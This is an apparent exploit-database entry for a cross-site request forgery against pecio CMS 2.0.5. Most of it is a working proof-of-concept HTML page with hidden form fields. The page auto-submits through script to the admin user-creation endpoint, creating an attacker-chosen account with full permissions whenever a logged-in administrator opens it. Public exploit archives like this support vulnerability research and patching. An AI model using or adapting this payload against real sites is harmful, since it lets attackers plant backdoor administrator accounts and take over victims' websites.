pecio CMS 2.0.5 – Cross-Site Request Forgery (Add Admin)

  • 作者: P0C T34M
    日期: 2010-12-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15835/
  • #Title: pecio CMS v2.0.5 <= CSRF Add Admin
    #Script : pecio CMS v2.0.5 
    #Language : Php
    #Download : Download: http://pecio-cms.com/pec_upload/files/pecio-2.0.5.zip
    #Date : 2010/12/25
    #Found: by P0C T34M >> tnt-r00t 
    #Homepage : www.p0c.cc
    
    <html>
    <form name="tnt" action="http://127.0.0.1/pec/pec_admin/admin.php?area=users&ampview=default&action=create" method="post">
    
    <input type="hidden" name="user_name" type="hidden" value="myna0me"/ >
    <input type="hidden" name="user_forename" type="hidden" value="r00t" />
    <input type="hidden" name="user_surname" type="hidden" value="myname"/ >
    <input type="hidden" name="user_email" type="hidden" value="r00t@cr.tr" />
    <input type="hidden" name="user_password" type="hidden" value="r0o0t" />
    <input type="hidden" name="user_password_repeat" type="hidden" value="r0o0t" />
    
    <input type="hidden" name="user_perm_articles" id="perm_articles_full" value="2" checked="checked" type="radio">
    <input type="hidden" name="user_perm_menupoints" id="perm_menupoints_none" value="2" checked="checked" type="radio">
    <input type="hidden" name="user_perm_menupoints" id="perm_menupoints_full" value="2" checked="checked" type="radio">
    <input type="hidden" name="user_perm_texts" id="perm_texts_full" value="2" checked="checked" type="radio"> 
    <input type="hidden" name="user_perm_links" id="perm_links_full" value="2" checked="checked" type="radio">
    <input type="hidden" name="user_perm_posts" id="perm_posts_full" value="2" checked="checked" type="radio"> 
    <input type="hidden" name="user_perm_comments" id="perm_comments_full" value="2" checked="checked" type="radio"> 
    <input type="hidden" name="user_perm_users" id="perm_users_full" value="2" checked="checked" type="radio">
    <input type="hidden" name="user_perm_plugins" id="perm_plugins_full" value="2" checked="checked" type="radio"> 
    <input type="hidden" name="user_perm_templates" id="perm_templates_full" value="2" checked="checked" type="radio">
    <input type="hidden" name="user_perm_settings" id="perm_settings_full" value="2" checked="checked" type="radio">
    
    <input type="hidden" name="Submit" class="submit" value="Add User" type="submit"/>
    </form>
    <script>document.tnt.submit();</script>
    </html>
     
    NickName : P0C T34M